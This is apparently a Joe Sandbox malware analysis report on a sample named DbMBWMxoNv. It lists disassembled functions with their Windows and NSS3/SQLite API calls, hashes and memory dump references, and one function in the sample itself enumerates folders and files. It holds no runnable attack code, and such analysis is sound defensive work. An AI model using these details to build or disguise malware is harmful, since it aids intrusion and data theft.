Instruction ID: c2aac5136589ed0391c6129d9d51fc3e6bc261c335268f8058ed62d8fab8a31e
Opcode Fuzzy Hash: 6430a4bd2fb601e88626a8d03c32794842674903c944d64bbad2ec33a99e1957
Instruction Fuzzy Hash: E2316CB2E016055FEB00CF69CC409AF77F6EF85328B198128E8259BB80EB31DC15C7A1

Function 6CF68C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6CF68C7C

Part of subcall function 6D009DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6D050A27), ref: 6D009DC6
Part of subcall function 6D009DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6D050A27), ref: 6D009DD1
Part of subcall function 6D009DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D009DED

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF68CB0
TlsGetValue.KERNEL32 ref: 6CF68CD1
EnterCriticalSection.KERNEL32(?), ref: 6CF68CE5
PR_Unlock.NSS3(?), ref: 6CF68D2E
PR_SetError.NSS3(FFFFE00F,00000000), ref: 6CF68D62
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CF68D93

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
String ID:
API String ID: 3131193014-0
Opcode ID: 6f151b2942624a8babc9a1eb4d2d64f3733968da5819c5484bc49312f96e9f2c
Instruction ID: 768fb595e875d3d3b0a9c886e533a8c78097efe6e8a2ad362da8e3eb4eac3b57
Opcode Fuzzy Hash: 6f151b2942624a8babc9a1eb4d2d64f3733968da5819c5484bc49312f96e9f2c
Instruction Fuzzy Hash: F5314472D01605AFEB009F6ADC44B9AB7B4BF46318F14013AEE1967F91D770A924C7E1

Function 6CFA9D60 Relevance: 10.6, APIs: 7, Instructions: 108memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6CFA9C5B), ref: 6CFA9D82

Part of subcall function 6CFA14C0: TlsGetValue.KERNEL32 ref: 6CFA14E0
Part of subcall function 6CFA14C0: EnterCriticalSection.KERNEL32 ref: 6CFA14F5
Part of subcall function 6CFA14C0: PR_Unlock.NSS3 ref: 6CFA150D

PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6CFA9C5B), ref: 6CFA9DA9

Part of subcall function 6CFA1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6CF4895A,00000000,?,00000000,?,00000000,?,00000000,?,6CF3F599,?,00000000), ref: 6CFA136A
Part of subcall function 6CFA1340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6CF4895A,00000000,?,00000000,?,00000000,?,00000000,?,6CF3F599,?,00000000), ref: 6CFA137E
Part of subcall function 6CFA1340: PL_ArenaGrow.NSS3(?,6CF3F599,?,00000000,?,6CF4895A,00000000,?,00000000,?,00000000,?,00000000,?,6CF3F599,?), ref: 6CFA13CF
Part of subcall function 6CFA1340: PR_Unlock.NSS3(?,?,6CF4895A,00000000,?,00000000,?,00000000,?,00000000,?,6CF3F599,?,00000000), ref: 6CFA145C

PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6CFA9C5B), ref: 6CFA9DCE

Part of subcall function 6CFA1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6CF4895A,00000000,?,00000000,?,00000000,?,00000000,?,6CF3F599,?,00000000), ref: 6CFA13F0
Part of subcall function 6CFA1340: PL_ArenaGrow.NSS3(?,6CF3F599,?,?,?,00000000,00000000,?,6CF4895A,00000000,?,00000000,?,00000000,?,00000000), ref: 6CFA1445

PORT_ArenaAlloc_Util.NSS3(?,00000008,6CFA9C5B), ref: 6CFA9DDC
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6CFA9C5B), ref: 6CFA9DFE
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6CFA9C5B), ref: 6CFA9E43
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,6CFA9C5B), ref: 6CFA9E91

Part of subcall function 6CFEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CFEC2BF

Part of subcall function 6CFA1560: TlsGetValue.KERNEL32(00000000,00000000,?,?,?,6CF9FAAB,00000000), ref: 6CFA157E
Part of subcall function 6CFA1560: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6CF9FAAB,00000000), ref: 6CFA1592
Part of subcall function 6CFA1560: memset.VCRUNTIME140(?,00000000,?), ref: 6CFA1600
Part of subcall function 6CFA1560: PL_ArenaRelease.NSS3(?,?), ref: 6CFA1620
Part of subcall function 6CFA1560: PR_Unlock.NSS3(?), ref: 6CFA1639

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Arena$Util$Value$Alloc_CriticalEnterSectionUnlock$GrowGrow_$ErrorMark_Releasememset
String ID:
API String ID: 3425318038-0
Opcode ID: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
Instruction ID: e065bff3d2b1fa5448c3acbd81a9d8f68595d0d2b78ff59236fee135e7c8a910
Opcode Fuzzy Hash: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
Instruction Fuzzy Hash: 3D417CB4601606EFE7409F55D880B92BBA1FF45348F258128D8188BFA1EB73E935CB90

Function 6CF6DDD0 Relevance: 10.6, APIs: 7, Instructions: 106COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?), ref: 6CF6DDEC

Part of subcall function 6CFA0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CFA08B4

PK11_DigestBegin.NSS3(00000000), ref: 6CF6DE70
PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6CF6DE83
HASH_ResultLenByOidTag.NSS3(?), ref: 6CF6DE95
PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6CF6DEAE
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CF6DEBB
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CF6DECC

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: K11_$Digest$Error$BeginContextDestroyFinalFindResultTag_Util
String ID:
API String ID: 1091488953-0
Opcode ID: c50141b23f9ff0394a7e287e12f1561407d50b22b6f7f3e0d2766d7d9524b554
Instruction ID: 931076e65d963db9448c13b08712a0cc1259e4d5038ef6e5c653b52c5c2dc394
Opcode Fuzzy Hash: c50141b23f9ff0394a7e287e12f1561407d50b22b6f7f3e0d2766d7d9524b554
Instruction Fuzzy Hash: C931C7B2D042146BEB00AF6AAD41BFB76B8AF65708F150135ED09A7B41FB31D914C7E2

Function 004149D0 Relevance: 10.6, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,02D25850,?,00000104,?,00000104,?,00000104,?,00000104), ref: 00414A2B

Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B

lstrcatA.KERNEL32(?,00000000), ref: 00414A51
lstrcatA.KERNEL32(?,?), ref: 00414A70
lstrcatA.KERNEL32(?,?), ref: 00414A84
lstrcatA.KERNEL32(?,02D209D8), ref: 00414A97
lstrcatA.KERNEL32(?,?), ref: 00414AAB
lstrcatA.KERNEL32(?,02D25E98), ref: 00414ABF

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 00418F20: GetFileAttributesA.KERNEL32(00000000,?,00410277,?,00000000,?,00000000,00420DB2,00420DAF), ref: 00418F2F

Part of subcall function 004147C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004147D0
Part of subcall function 004147C0: HeapAlloc.KERNEL32(00000000), ref: 004147D7
Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147F6
Part of subcall function 004147C0: FindFirstFileA.KERNEL32(?,?), ref: 0041480D

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 167551676-0
Opcode ID: 863de86941b369a15ad9fa27cea89913dd8852b33be1bccf61b8257fa53b6049
Instruction ID: a5c2d428b28de13255d2ac7946ab4b1842291e6be0275f36c7222d1bbee1b90f
Opcode Fuzzy Hash: 863de86941b369a15ad9fa27cea89913dd8852b33be1bccf61b8257fa53b6049
Instruction Fuzzy Hash: F93160B2D0421867CB14FBB0DC95EDD733EAB48704F40458EB20596091EE78A7C8CB99

Function 6CF9DC10 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6CF9D9E4,00000000), ref: 6CF9DC30
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6CF9D9E4,00000000), ref: 6CF9DC4E
PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6CF9D9E4,00000000), ref: 6CF9DC5A
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CF9DC7E
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CF9DCAD

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Alloc_Util$Arenamemcpy
String ID:
API String ID: 2632744278-0
Opcode ID: 0c75ee6d768fd329bd1375b858700aebdc14b42da149e3bbdf22a0cda7488356
Instruction ID: 2cb8e53011c43353c32672b8f7a799ac05937cfb6ead72bf8f0055b4b4ee4e9e
Opcode Fuzzy Hash: 0c75ee6d768fd329bd1375b858700aebdc14b42da149e3bbdf22a0cda7488356
Instruction Fuzzy Hash: 34316DB5A00205DFEB50CF5DD884B56B7F8AF45358F248429E94CCBB01E7B2E944CBA1

Function 6CFACEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6CFACD93,?), ref: 6CFACEEE

Part of subcall function 6CFA14C0: TlsGetValue.KERNEL32 ref: 6CFA14E0
Part of subcall function 6CFA14C0: EnterCriticalSection.KERNEL32 ref: 6CFA14F5
Part of subcall function 6CFA14C0: PR_Unlock.NSS3 ref: 6CFA150D

PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CFACD93,?), ref: 6CFACEFC

Part of subcall function 6CFA10C0: TlsGetValue.KERNEL32(?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA10F3
Part of subcall function 6CFA10C0: EnterCriticalSection.KERNEL32(?,?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA110C
Part of subcall function 6CFA10C0: PL_ArenaAllocate.NSS3(?,?,?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA1141
Part of subcall function 6CFA10C0: PR_Unlock.NSS3(?,?,?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA1182
Part of subcall function 6CFA10C0: TlsGetValue.KERNEL32(?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA119C

SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CFACD93,?), ref: 6CFACF0B

Part of subcall function 6CFA0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CFA08B4

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CFACD93,?), ref: 6CFACF1D

Part of subcall function 6CF9FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CF98D2D,?,00000000,?), ref: 6CF9FB85
Part of subcall function 6CF9FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CF9FBB1

PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CFACD93,?), ref: 6CFACF47
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CFACD93,?), ref: 6CFACF67
SECITEM_CopyItem_Util.NSS3(?,00000000,6CFACD93,?,?,?,?,?,?,?,?,?,?,?,6CFACD93,?), ref: 6CFACF78

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
String ID:
API String ID: 4291907967-0
Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction ID: fce9b3d494617068b137d9112673c4a619f404b99df36bbe4a3f62eb1b1c9064
Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction Fuzzy Hash: C71172A5E00205DBEB10AFEA7C41B6BF6EC9F5964DF048039EC09D7741FB61D90986B1

Function 6CF58C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CF58C1B
EnterCriticalSection.KERNEL32 ref: 6CF58C34
PL_ArenaAllocate.NSS3 ref: 6CF58C65
PR_Unlock.NSS3 ref: 6CF58C9C
PR_Unlock.NSS3 ref: 6CF58CB6

Part of subcall function 6CFEDD70: TlsGetValue.KERNEL32 ref: 6CFEDD8C
Part of subcall function 6CFEDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CFEDDB4

Strings

KRAM, xrefs: 6CF58C8F

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
String ID: KRAM
API String ID: 4127063985-3815160215
Opcode ID: b028b6fcb8a13d6b41241f6c11d8a7f071def4dc960a4b42af79357a99bbb18e
Instruction ID: 63ee538f2ad68762da710cbdf5b3ec7cb2db0a8c5c97e4256559f10c2a18be37
Opcode Fuzzy Hash: b028b6fcb8a13d6b41241f6c11d8a7f071def4dc960a4b42af79357a99bbb18e
Instruction Fuzzy Hash: 8721A1B19156018FD700AF78C488659FBF4FF55304F45896ED988CBB01EB35D89ACB82

Function 6D052C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6D052CA0
PR_ExitMonitor.NSS3 ref: 6D052CBE
calloc.MOZGLUE(00000001,00000014), ref: 6D052CD1
strdup.MOZGLUE(?), ref: 6D052CE1
PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6D052D27

Strings

Loaded library %s (static lib), xrefs: 6D052D22

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Monitor$EnterExitPrintcallocstrdup
String ID: Loaded library %s (static lib)
API String ID: 3511436785-2186981405
Opcode ID: 2d71abd332f33871e913d78dbad6444afed8102729a45f8e406261e094196ad5
Instruction ID: c0de9c9eebfb6954b57ae4c0cdb3ac79cfa3747e6503b9425cccfd515b882262
Opcode Fuzzy Hash: 2d71abd332f33871e913d78dbad6444afed8102729a45f8e406261e094196ad5
Instruction Fuzzy Hash: 3B1190B5A002109FFB20CF25D951B6E7BB5AF45319F48803DDD0987343E771A814CBA2

Function 6CF4BDC0 Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6CF4BDCA

Part of subcall function 6CFA0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CF487ED,00000800,6CF3EF74,00000000), ref: 6CFA1000
Part of subcall function 6CFA0FF0: PR_NewLock.NSS3(?,00000800,6CF3EF74,00000000), ref: 6CFA1016
Part of subcall function 6CFA0FF0: PL_InitArenaPool.NSS3(00000000,security,6CF487ED,00000008,?,00000800,6CF3EF74,00000000), ref: 6CFA102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CF4BDDB

Part of subcall function 6CFA10C0: TlsGetValue.KERNEL32(?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA10F3
Part of subcall function 6CFA10C0: EnterCriticalSection.KERNEL32(?,?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA110C
Part of subcall function 6CFA10C0: PL_ArenaAllocate.NSS3(?,?,?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA1141
Part of subcall function 6CFA10C0: PR_Unlock.NSS3(?,?,?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA1182
Part of subcall function 6CFA10C0: TlsGetValue.KERNEL32(?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CF4BDEC

Part of subcall function 6CFA10C0: PL_ArenaAllocate.NSS3(?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA116E

SECITEM_CopyItem_Util.NSS3(00000000,00000000,?), ref: 6CF4BE03

Part of subcall function 6CF9FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CF98D2D,?,00000000,?), ref: 6CF9FB85
Part of subcall function 6CF9FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CF9FBB1

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CF4BE22
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CF4BE30
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CF4BE3B

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: ArenaUtil$Alloc_$AllocateArena_ErrorValue$CopyCriticalEnterFreeInitItem_LockPoolSectionUnlockcallocmemcpy
String ID:
API String ID: 1821307800-0
Opcode ID: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
Instruction ID: 8cdf7245a974627d67b6cbda483203c4806ea0b7b95683ede148a131ca6f7818
Opcode Fuzzy Hash: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
Instruction Fuzzy Hash: FD01DB69A41611B7F61016A67C01FDF7D484F9138DF148030FF159AB83FB55D51982B5

Function 6CFD1C60 Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6CFD1C74

Part of subcall function 6CFEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CFEC2BF

DeleteCriticalSection.KERNEL32(?), ref: 6CFD1C92
free.MOZGLUE(?), ref: 6CFD1C99
DeleteCriticalSection.KERNEL32(?), ref: 6CFD1CCB
free.MOZGLUE(?), ref: 6CFD1CD2

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: CriticalDeleteSectionfree$ErrorValue
String ID:
API String ID: 3805613680-0
Opcode ID: af6d1d92245dcb80930c99136a475ac2ff3dc7cac05cc9546ea9cc3bb9b679b3
Instruction ID: b5cf53cc79e5a04f467424e6dee3e6b4ec5562d2865f7362950ad9124d747e12
Opcode Fuzzy Hash: af6d1d92245dcb80930c99136a475ac2ff3dc7cac05cc9546ea9cc3bb9b679b3
Instruction Fuzzy Hash: 8E01B9B1D01A20AFDF309FB6AD0978E3B78670A318F585135E909A7B41D731A1548795

Function 6D031C40 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 45COMMON

Download Yara Rule

APIs

sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,6CF33D77,?,?,6CF34E1D), ref: 6D031C8A
sqlite3_free.NSS3(00000000), ref: 6D031CB6

Strings

an index, xrefs: 6D031C67
a CHECK constraint, xrefs: 6D031C76, 6D031C81
non-deterministic use of %s() in %s, xrefs: 6D031C85
a generated column, xrefs: 6D031C6C

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: sqlite3_freesqlite3_mprintf
String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s
API String ID: 1840970956-3705377941
